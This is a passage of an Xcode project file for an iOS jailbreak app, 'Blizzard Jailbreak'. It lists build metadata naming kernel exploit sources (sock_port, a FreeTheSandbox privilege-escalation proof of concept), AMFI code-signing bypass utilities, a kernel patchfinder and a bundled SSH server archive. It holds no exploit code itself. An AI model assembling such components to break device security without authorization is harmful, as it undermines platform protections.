D613B73B24E2B1530069CA9B /* liboffsetfinder64.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = liboffsetfinder64.a; sourceTree = "<group>"; };
D613B73C24E2B1530069CA9B /* libplist.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libplist.a; sourceTree = "<group>"; };
D613B73D24E2B1530069CA9B /* libplist++.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = "libplist++.a"; sourceTree = "<group>"; };
D613B73E24E2B1530069CA9B /* libmerged.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libmerged.a; sourceTree = "<group>"; };
D613B73F24E2B1540069CA9B /* libimg4tool.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libimg4tool.a; sourceTree = "<group>"; };
D613B74A24E2B2560069CA9B /* libcompression.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libcompression.tbd; path = usr/lib/libcompression.tbd; sourceTree = SDKROOT; };
D613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libMobileGestalt.tbd; path = usr/lib/libMobileGestalt.tbd; sourceTree = SDKROOT; };
D613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = BlizzardSpawnerTools.c; sourceTree = "<group>"; };
D613B74F24E2CD5E0069CA9B /* BlizzardSpawnerTools.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BlizzardSpawnerTools.h; sourceTree = "<group>"; };
D613B75124E2E82F0069CA9B /* amfid_tools.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid_tools.h; sourceTree = "<group>"; };
D613B75224E2E8300069CA9B /* amfi_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfi_utils.h; sourceTree = "<group>"; };
D613B75324E2E8300069CA9B /* amfi_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfi_utils.m; sourceTree = "<group>"; };
D613B75424E2E8300069CA9B /* amfid_tools.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid_tools.m; sourceTree = "<group>"; };
D613B75524E2E8300069CA9B /* amfid_mem.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid_mem.h; sourceTree = "<group>"; };
D613B75624E2E8300069CA9B /* amfid_mem.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid_mem.m; sourceTree = "<group>"; };
D613B75A24E2E8580069CA9B /* amfid.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid.h; sourceTree = "<group>"; };
D613B75B24E2E8580069CA9B /* amfid.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid.m; sourceTree = "<group>"; };
D613B75D24E2E8690069CA9B /* cs_blob.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = cs_blob.h; sourceTree = "<group>"; };
D613B75E24E2EEFD0069CA9B /* osobject.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = osobject.c; sourceTree = "<group>"; };
D613B75F24E2EEFD0069CA9B /* osobject.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = osobject.h; sourceTree = "<group>"; };
D613B76424E2F2D30069CA9B /* kernSymbolication.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kernSymbolication.c; sourceTree = "<group>"; };
D613B76524E2F2D30069CA9B /* kernSymbolication.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kernSymbolication.h; sourceTree = "<group>"; };
D613B78024E2F9980069CA9B /* lzssdec.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; path = lzssdec.cpp; sourceTree = "<group>"; };
D613B78124E2F9980069CA9B /* lzssdec.hpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.h; path = lzssdec.hpp; sourceTree = "<group>"; };
D62BC51D24E4113200EC63D4 /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = "<group>"; };
D62BC51F24E41AF500EC63D4 /* basebins.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = basebins.tar; sourceTree = "<group>"; };
D62BC52124E41F2500EC63D4 /* dropbear.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = dropbear.tar; sourceTree = "<group>"; };
D62CA1E324E1C7EA002E6756 /* patchfinder64.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = "<group>"; };
D62CA1E424E1C7EA002E6756 /* patchfinder64.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = patchfinder64.m; sourceTree = "<group>"; };
D62CA1E624E1C7F7002E6756 /* kexecute.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kexecute.c; sourceTree = "<group>"; };
D62CA1E724E1C7F7002E6756 /* kexecute.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kexecute.h; sourceTree = "<group>"; };
D62CA1E924E1C7FF002E6756 /* kernel_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kernel_utils.h; sourceTree = "<group>"; };
D62CA1EA24E1C7FF002E6756 /* kernel_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = kernel_utils.m; sourceTree = "<group>"; };
D62CA1EC24E1C83E002E6756 /* offsetof.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsetof.c; sourceTree = "<group>"; };
D62CA1ED24E1C83E002E6756 /* offsetof.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsetof.h; sourceTree = "<group>"; };
D62CA20A24E1D95F002E6756 /* kerneldec */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = kerneldec; path = "../jelbrekLib-master/kerneldec/kerneldec"; sourceTree = "<group>"; };
D63EDABF24E1989F009B305D /* blizzardJailbreak.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = blizzardJailbreak.m; sourceTree = "<group>"; };
D63EDAC024E1989F009B305D /* blizzardJailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = blizzardJailbreak.h; sourceTree = "<group>"; };
D69C4C96256865BF001DE2BC /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = IOKit.tbd; path = ../ToolChain/IOKit.tbd; sourceTree = "<group>"; };
D69C4C9825686627001DE2BC /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = IOKit.tbd; path = "../ToolChain/Jailbreak Frameworks/IOKit.tbd"; sourceTree = "<group>"; };
D69C4C9D256866A2001DE2BC /* OSMessageNotification.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = OSMessageNotification.h; path = include/IOKit/OSMessageNotification.h; sourceTree = "<group>"; };
D69C4CA225686884001DE2BC /* xpc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = xpc.h; sourceTree = "<group>"; };
D69C4CA325686884001DE2BC /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vnode.h; sourceTree = "<group>"; };
D69C4CA425686894001DE2BC /* ios13_userspace_pac.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_userspace_pac.c; sourceTree = "<group>"; };
D69C4CA525686894001DE2BC /* ios13_kernel_universal.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_kernel_universal.c; sourceTree = "<group>"; };
D69C4CA625686894001DE2BC /* ios13_userspace.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_userspace.c; sourceTree = "<group>"; };
D69C4CA725686894001DE2BC /* ios13_change_offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ios13_change_offsets.m; sourceTree = "<group>"; };
D69C4CA825686894001DE2BC /* xpc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = xpc.h; path = "../../../FreeTheSandbox_LPE_POC_13.7-main/ios13_app1/xpc.h"; sourceTree = "<group>"; };
D69C4CA925686894001DE2BC /* IOTypes.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOTypes.h; sourceTree = "<group>"; };
D69C4CAA25686895001DE2BC /* libsnappy.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = libsnappy.c; sourceTree = "<group>"; };
D69C4CAB25686895001DE2BC /* ios_7st_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ios_7st_utils.m; sourceTree = "<group>"; };
D69C4CAC25686895001DE2BC /* libsnappy.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = libsnappy.h; sourceTree = "<group>"; };
D69C4CAD25686895001DE2BC /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = vnode.h; path = "../../../FreeTheSandbox_LPE_POC_13.7-main/ios13_app1/vnode.h"; sourceTree = "<group>"; };
D69C4CB5256868BB001DE2BC /* IOReturn.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOReturn.h; sourceTree = "<group>"; };
D69C4CB6256868BB001DE2BC /* IOKitKeys.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOKitKeys.h; sourceTree = "<group>"; };
D69C4CB7256868BB001DE2BC /* IOKitLib.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOKitLib.h; sourceTree = "<group>"; };
D69C4CB8256868BB001DE2BC /* IOTypes.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOTypes.h; sourceTree = "<group>"; };
D69C4CBB25686D0F001DE2BC /* freethesandbox.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = freethesandbox.h; sourceTree = "<group>"; };
D6FFA56024E1A59A00CAC2E2 /* blizzardView.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = blizzardView.h; sourceTree = "<group>"; };
D6FFA56124E1A59A00CAC2E2 /* blizzardView.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = blizzardView.m; sourceTree = "<group>"; };
/* End PBXFileReference section */
/* Begin PBXFrameworksBuildPhase section */
82F179E922DF4ED700231F8C /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
D69C4C9925686628001DE2BC /* IOKit.tbd in Frameworks */,
D613B74D24E2B2600069CA9B /* libMobileGestalt.tbd in Frameworks */,
D613B74B24E2B2560069CA9B /* libcompression.tbd in Frameworks */,
D613B74624E2B1E70069CA9B /* libimg4tool.a in Frameworks */,
D613B74724E2B1E70069CA9B /* libmerged.a in Frameworks */,
D613B74824E2B1E70069CA9B /* libplist.a in Frameworks */,
D613B74924E2B1E70069CA9B /* libplist++.a in Frameworks */,
D613B74524E2B1C20069CA9B /* liboffsetfinder64.a in Frameworks */,
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0122DF4ED800231F8C /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0C22DF4ED800231F8C /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXFrameworksBuildPhase section */
/* Begin PBXGroup section */
82F179E322DF4ED700231F8C = {
isa = PBXGroup;
children = (
D69C4C9525686579001DE2BC /* Exploits */,
D62BC51C24E4112300EC63D4 /* Base Binaries */,
D613B73A24E2B13E0069CA9B /* Helper Libraries */,
D613B71D24E2A68D0069CA9B /* APFS Utilities */,
D613B71C24E2A6690069CA9B /* AMFI Utilities */,
D62CA1DF24E1C6FB002E6756 /* Kernel Utilities */,
D62CA1DB24E1C660002E6756 /* PatchFinder */,
D6FFA55F24E19E0900CAC2E2 /* Blizzard Jailbreak */,
82F17A0722DF4ED800231F8C /* sock_port_tests */,
82F17A1222DF4ED800231F8C /* sock_port_UITests */,
82F179ED22DF4ED700231F8C /* Products */,
82F17A2722DF57B700231F8C /* Frameworks */,
);
sourceTree = "<group>";
};
82F179ED22DF4ED700231F8C /* Products */ = {
isa = PBXGroup;
children = (
82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */,
82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */,
82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */,
);
name = Products;
sourceTree = "<group>";
};
82F179EE22DF4ED700231F8C /* sock_port */ = {
isa = PBXGroup;
children = (
D69C4C9D256866A2001DE2BC /* OSMessageNotification.h */,
82F17A2122DF4EF100231F8C /* exploit.c */,
82F17A2222DF4EF100231F8C /* exploit.h */,
82F17A2422DF4F1C00231F8C /* exploit_utilities.c */,
82F17A2522DF4F1C00231F8C /* exploit_utilities.h */,
8288501022E07303005D10FC /* kernel_memory.c */,
8288501122E07303005D10FC /* kernel_memory.h */,
8288501422E07C14005D10FC /* offsets.h */,
8288501322E07C14005D10FC /* offsets.m */,
D62CA1EC24E1C83E002E6756 /* offsetof.c */,
D62CA1ED24E1C83E002E6756 /* offsetof.h */,
82E9B71422E24BAD0016AA39 /* iosurface.c */,
82E9B71322E24BAC0016AA39 /* iosurface.h */,
);
path = sock_port;
sourceTree = "<group>";
};
82F17A0722DF4ED800231F8C /* sock_port_tests */ = {
isa = PBXGroup;
children = (
82F17A0822DF4ED800231F8C /* socket_freeTests.m */,
82F17A0A22DF4ED800231F8C /* Info.plist */,
);
path = sock_port_tests;
sourceTree = "<group>";
};
82F17A1222DF4ED800231F8C /* sock_port_UITests */ = {
isa = PBXGroup;
children = (
82F17A1322DF4ED800231F8C /* socket_freeUITests.m */,
82F17A1522DF4ED800231F8C /* Info.plist */,
);
path = sock_port_UITests;
sourceTree = "<group>";
};
82F17A2722DF57B700231F8C /* Frameworks */ = {
isa = PBXGroup;
children = (
D69C4C96256865BF001DE2BC /* IOKit.tbd */,
D69C4C9825686627001DE2BC /* IOKit.tbd */,
D613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */,
D613B74A24E2B2560069CA9B /* libcompression.tbd */,
D613B72E24E2A7B70069CA9B /* libimg4tool.a */,
D613B72D24E2A7B70069CA9B /* libmerged.a */,
D613B72A24E2A7B70069CA9B /* liboffsetfinder64.a */,
D613B72B24E2A7B70069CA9B /* libplist.a */,
D613B72C24E2A7B70069CA9B /* libplist++.a */,
D62CA20A24E1D95F002E6756 /* kerneldec */,
82F17A2822DF57B700231F8C /* IOKit.tbd */,
);
name = Frameworks;
sourceTree = "<group>";
};
D613B71C24E2A6690069CA9B /* AMFI Utilities */ = {
isa = PBXGroup;
children = (
D613B75E24E2EEFD0069CA9B /* osobject.c */,
D613B75F24E2EEFD0069CA9B /* osobject.h */,
D613B75D24E2E8690069CA9B /* cs_blob.h */,
D613B75224E2E8300069CA9B /* amfi_utils.h */,
D613B75324E2E8300069CA9B /* amfi_utils.m */,
D613B75524E2E8300069CA9B /* amfid_mem.h */,
D613B75624E2E8300069CA9B /* amfid_mem.m */,
D613B75124E2E82F0069CA9B /* amfid_tools.h */,
D613B75424E2E8300069CA9B /* amfid_tools.m */,
D613B75A24E2E8580069CA9B /* amfid.h */,
D613B75B24E2E8580069CA9B /* amfid.m */,
);
path = "AMFI Utilities";
sourceTree = "<group>";
};
D613B71D24E2A68D0069CA9B /* APFS Utilities */ = {
isa = PBXGroup;
children = (
D613B73724E2A8C40069CA9B /* IOKit.h */,
D613B72924E2A79F0069CA9B /* liboffsetfinder64.hpp */,
D613B72624E2A76A0069CA9B /* offsetfinder.cpp */,
D613B72424E2A76A0069CA9B /* rootfs_remount.m */,
D613B72524E2A76A0069CA9B /* rootfs_remount.h */,
D613B73624E2A8B00069CA9B /* snapshot_tools.h */,
D613B73424E2A8AB0069CA9B /* snapshot_tools.c */,
);
path = "APFS Utilities";
sourceTree = "<group>";
};
D613B73A24E2B13E0069CA9B /* Helper Libraries */ = {
isa = PBXGroup;
children = (
D613B73F24E2B1540069CA9B /* libimg4tool.a */,
D613B73E24E2B1530069CA9B /* libmerged.a */,
D613B73B24E2B1530069CA9B /* liboffsetfinder64.a */,
D613B73C24E2B1530069CA9B /* libplist.a */,
D613B73D24E2B1530069CA9B /* libplist++.a */,
);
path = "Helper Libraries";
sourceTree = "<group>";
};
D62BC51C24E4112300EC63D4 /* Base Binaries */ = {
isa = PBXGroup;
children = (
D62BC51F24E41AF500EC63D4 /* basebins.tar */,
D62BC52124E41F2500EC63D4 /* dropbear.tar */,
D62BC51D24E4113200EC63D4 /* tar */,
);
path = "Base Binaries";
sourceTree = "<group>";
};
D62CA1DB24E1C660002E6756 /* PatchFinder */ = {
isa = PBXGroup;
children = (
D62CA1E324E1C7EA002E6756 /* patchfinder64.h */,
D62CA1E424E1C7EA002E6756 /* patchfinder64.m */,
);
path = PatchFinder;
sourceTree = "<group>";
};
D62CA1DF24E1C6FB002E6756 /* Kernel Utilities */ = {
isa = PBXGroup;
children = (
D613B73824E2A99B0069CA9B /* system_reboot.h */,
D62CA1E924E1C7FF002E6756 /* kernel_utils.h */,
D62CA1EA24E1C7FF002E6756 /* kernel_utils.m */,
D62CA1E624E1C7F7002E6756 /* kexecute.c */,
D62CA1E724E1C7F7002E6756 /* kexecute.h */,
D613B76424E2F2D30069CA9B /* kernSymbolication.c */,
D613B76524E2F2D30069CA9B /* kernSymbolication.h */,
D613B78124E2F9980069CA9B /* lzssdec.hpp */,
D613B78024E2F9980069CA9B /* lzssdec.cpp */,
);
path = "Kernel Utilities";
sourceTree = "<group>";
};
D69C4C9525686579001DE2BC /* Exploits */ = {
isa = PBXGroup;
children = (
D69C4CB4256868A8001DE2BC /* IOKit */,
D69C4CA125686866001DE2BC /* FreeTheSandbox */,
82F179EE22DF4ED700231F8C /* sock_port */,
);
path = Exploits;
sourceTree = "<group>";
};
D69C4CA125686866001DE2BC /* FreeTheSandbox */ = {
isa = PBXGroup;
children = (
D69C4CAB25686895001DE2BC /* ios_7st_utils.m */,
D69C4CA725686894001DE2BC /* ios13_change_offsets.m */,
D69C4CA525686894001DE2BC /* ios13_kernel_universal.c */,
D69C4CA425686894001DE2BC /* ios13_userspace_pac.c */,
D69C4CA625686894001DE2BC /* ios13_userspace.c */,
D69C4CBB25686D0F001DE2BC /* freethesandbox.h */,
D69C4CA925686894001DE2BC /* IOTypes.h */,
D69C4CAA25686895001DE2BC /* libsnappy.c */,
D69C4CAC25686895001DE2BC /* libsnappy.h */,
D69C4CAD25686895001DE2BC /* vnode.h */,
D69C4CA825686894001DE2BC /* xpc.h */,
D69C4CA325686884001DE2BC /* vnode.h */,
D69C4CA225686884001DE2BC /* xpc.h */,
);
path = FreeTheSandbox;
sourceTree = "<group>";
};
D69C4CB4256868A8001DE2BC /* IOKit */ = {
isa = PBXGroup;
children = (
D69C4CB6256868BB001DE2BC /* IOKitKeys.h */,
D69C4CB7256868BB001DE2BC /* IOKitLib.h */,
D69C4CB5256868BB001DE2BC /* IOReturn.h */,
D69C4CB8256868BB001DE2BC /* IOTypes.h */,
);
path = IOKit;
sourceTree = "<group>";
};
D6FFA55F24E19E0900CAC2E2 /* Blizzard Jailbreak */ = {
isa = PBXGroup;
children = (
82F179FD22DF4ED700231F8C /* Info.plist */,
82F179EF22DF4ED700231F8C /* AppDelegate.h */,
82F179F022DF4ED700231F8C /* AppDelegate.m */,
82F179F822DF4ED700231F8C /* Assets.xcassets */,
82F179FE22DF4ED700231F8C /* main.m */,
82F179F522DF4ED700231F8C /* Main.storyboard */,
82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */,
D63EDAC024E1989F009B305D /* blizzardJailbreak.h */,
D63EDABF24E1989F009B305D /* blizzardJailbreak.m */,
D6FFA56024E1A59A00CAC2E2 /* blizzardView.h */,
D6FFA56124E1A59A00CAC2E2 /* blizzardView.m */,
D613B71924E217D90069CA9B /* BlizzardLog.h */,
D613B71A24E217D90069CA9B /* BlizzardLog.m */,
D613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */,
D613B74F24E2CD5E0069CA9B /* BlizzardSpawnerTools.h */,
);
path = "Blizzard Jailbreak";
sourceTree = "<group>";
};
/* End PBXGroup section */
/* Begin PBXNativeTarget section */
82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */ = {
isa = PBXNativeTarget;
buildConfigurationList = 82F17A1822DF4ED800231F8C /* Build configuration list for PBXNativeTarget "Blizzard Jailbreak" */;
buildPhases = (
82F179E822DF4ED700231F8C /* Sources */,
82F179E922DF4ED700231F8C /* Frameworks */,
82F179EA22DF4ED700231F8C /* Resources */,
);
buildRules = (
);
dependencies = (
);
name = "Blizzard Jailbreak";
productName = socket_free;
productReference = 82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */;
productType = "com.apple.product-type.application";
};
82F17A0322DF4ED800231F8C /* Blizzard JailbreakTests */ = {
isa = PBXNativeTarget;
buildConfigurationList = 82F17A1B22DF4ED800231F8C /* Build configuration list for PBXNativeTarget "Blizzard JailbreakTests" */;
buildPhases = (
82F17A0022DF4ED800231F8C /* Sources */,
82F17A0122DF4ED800231F8C /* Frameworks */,
82F17A0222DF4ED800231F8C /* Resources */,
);
buildRules = (
);
dependencies = (
82F17A0622DF4ED800231F8C /* PBXTargetDependency */,
);
name = "Blizzard JailbreakTests";
productName = socket_freeTests;
productReference = 82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */;
productType = "com.apple.product-type.bundle.unit-test";
};
82F17A0E22DF4ED800231F8C /* Blizzard JailbreakUITests */ = {
isa = PBXNativeTarget;
buildConfigurationList = 82F17A1E22DF4ED800231F8C /* Build configuration list for PBXNativeTarget "Blizzard JailbreakUITests" */;
buildPhases = (
82F17A0B22DF4ED800231F8C /* Sources */,
82F17A0C22DF4ED800231F8C /* Frameworks */,
82F17A0D22DF4ED800231F8C /* Resources */,
);
buildRules = (
);
dependencies = (
82F17A1122DF4ED800231F8C /* PBXTargetDependency */,
);
name = "Blizzard JailbreakUITests";
productName = socket_freeUITests;
productReference = 82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */;
productType = "com.apple.product-type.bundle.ui-testing";
};
/* End PBXNativeTarget section */
/* Begin PBXProject section */
82F179E422DF4ED700231F8C /* Project object */ = {
isa = PBXProject;
attributes = {
LastUpgradeCheck = 1010;
ORGANIZATIONNAME = GeoSn0w;
TargetAttributes = {
82F179EB22DF4ED700231F8C = {
CreatedOnToolsVersion = 9.2;
ProvisioningStyle = Automatic;
};
82F17A0322DF4ED800231F8C = {
CreatedOnToolsVersion = 9.2;
ProvisioningStyle = Automatic;
TestTargetID = 82F179EB22DF4ED700231F8C;
};
82F17A0E22DF4ED800231F8C = {
CreatedOnToolsVersion = 9.2;
ProvisioningStyle = Automatic;
TestTargetID = 82F179EB22DF4ED700231F8C;
};
};
};
buildConfigurationList = 82F179E722DF4ED700231F8C /* Build configuration list for PBXProject "Blizzard Jailbreak" */;
compatibilityVersion = "Xcode 8.0";
developmentRegion = en;
hasScannedForEncodings = 0;
knownRegions = (
en,
Base,
);
mainGroup = 82F179E322DF4ED700231F8C;
productRefGroup = 82F179ED22DF4ED700231F8C /* Products */;
projectDirPath = "";
projectRoot = "";
targets = (
82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */,
82F17A0322DF4ED800231F8C /* Blizzard JailbreakTests */,
82F17A0E22DF4ED800231F8C /* Blizzard JailbreakUITests */,
);
};
/* End PBXProject section */
/* Begin PBXResourcesBuildPhase section */
82F179EA22DF4ED700231F8C /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
82F179FC22DF4ED700231F8C /* LaunchScreen.storyboard in Resources */,
82F179F922DF4ED700231F8C /* Assets.xcassets in Resources */,
D62BC51E24E4113200EC63D4 /* tar in Resources */,
D62BC52024E41AF500EC63D4 /* basebins.tar in Resources */,
D62BC52224E41F2500EC63D4 /* dropbear.tar in Resources */,
82F179F722DF4ED700231F8C /* Main.storyboard in Resources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0222DF4ED800231F8C /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0D22DF4ED800231F8C /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXResourcesBuildPhase section */
/* Begin PBXSourcesBuildPhase section */
82F179E822DF4ED700231F8C /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
82F17A2622DF4F1C00231F8C /* exploit_utilities.c in Sources */,
D613B75724E2E8300069CA9B /* amfi_utils.m in Sources */,
D6FFA56224E1A59A00CAC2E2 /* blizzardView.m in Sources */,
D62CA1EB24E1C7FF002E6756 /* kernel_utils.m in Sources */,
D69C4CB225686895001DE2BC /* libsnappy.c in Sources */,
D69C4CAF25686895001DE2BC /* ios13_kernel_universal.c in Sources */,
D69C4CAE25686895001DE2BC /* ios13_userspace_pac.c in Sources */,
D613B78224E2F9980069CA9B /* lzssdec.cpp in Sources */,
82F179FF22DF4ED700231F8C /* main.m in Sources */,
D613B75824E2E8300069CA9B /* amfid_tools.m in Sources */,
D613B72824E2A76A0069CA9B /* offsetfinder.cpp in Sources */,
D613B73524E2A8AB0069CA9B /* snapshot_tools.c in Sources */,
D613B75024E2CD5E0069CA9B /* BlizzardSpawnerTools.c in Sources */,
D613B71B24E217D90069CA9B /* BlizzardLog.m in Sources */,
D62CA1EE24E1C83F002E6756 /* offsetof.c in Sources */,
82F179F122DF4ED700231F8C /* AppDelegate.m in Sources */,
82F17A2322DF4EF100231F8C /* exploit.c in Sources */,
D613B75C24E2E8590069CA9B /* amfid.m in Sources */,
82E9B71522E24BAD0016AA39 /* iosurface.c in Sources */,
D613B75924E2E8300069CA9B /* amfid_mem.m in Sources */,
D62CA1E824E1C7F7002E6756 /* kexecute.c in Sources */,
D69C4CB125686895001DE2BC /* ios13_change_offsets.m in Sources */,
D613B76624E2F2D30069CA9B /* kernSymbolication.c in Sources */,
D613B76024E2EEFD0069CA9B /* osobject.c in Sources */,
8288501522E07C15005D10FC /* offsets.m in Sources */,
D69C4CB025686895001DE2BC /* ios13_userspace.c in Sources */,
8288501222E07303005D10FC /* kernel_memory.c in Sources */,
D613B72724E2A76A0069CA9B /* rootfs_remount.m in Sources */,
D62CA1E524E1C7EA002E6756 /* patchfinder64.m in Sources */,
D63EDAC124E1989F009B305D /* blizzardJailbreak.m in Sources */,
D69C4CB325686895001DE2BC /* ios_7st_utils.m in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0022DF4ED800231F8C /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
82F17A0922DF4ED800231F8C /* socket_freeTests.m in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
82F17A0B22DF4ED800231F8C /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
82F17A1422DF4ED800231F8C /* socket_freeUITests.m in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXSourcesBuildPhase section */
/* Begin PBXTargetDependency section */
82F17A0622DF4ED800231F8C /* PBXTargetDependency */ = {
isa = PBXTargetDependency;
target = 82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */;
targetProxy = 82F17A0522DF4ED800231F8C /* PBXContainerItemProxy */;
};
82F17A1122DF4ED800231F8C /* PBXTargetDependency */ = {
isa = PBXTargetDependency;
target = 82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */;
targetProxy = 82F17A1022DF4ED800231F8C /* PBXContainerItemProxy */;
};
/* End PBXTargetDependency section */
/* Begin PBXVariantGroup section */
82F179F522DF4ED700231F8C /* Main.storyboard */ = {
isa = PBXVariantGroup;
children = (
82F179F622DF4ED700231F8C /* Base */,
);
name = Main.storyboard;
sourceTree = "<group>";
};
82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */ = {
isa = PBXVariantGroup;
children = (
82F179FB22DF4ED700231F8C /* Base */,
);
name = LaunchScreen.storyboard;
sourceTree = "<group>";
};
/* End PBXVariantGroup section */
/* Begin XCBuildConfiguration section */
82F17A1622DF4ED800231F8C /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_SEARCH_USER_PATHS = NO;
CLANG_ANALYZER_NONNULL = YES;
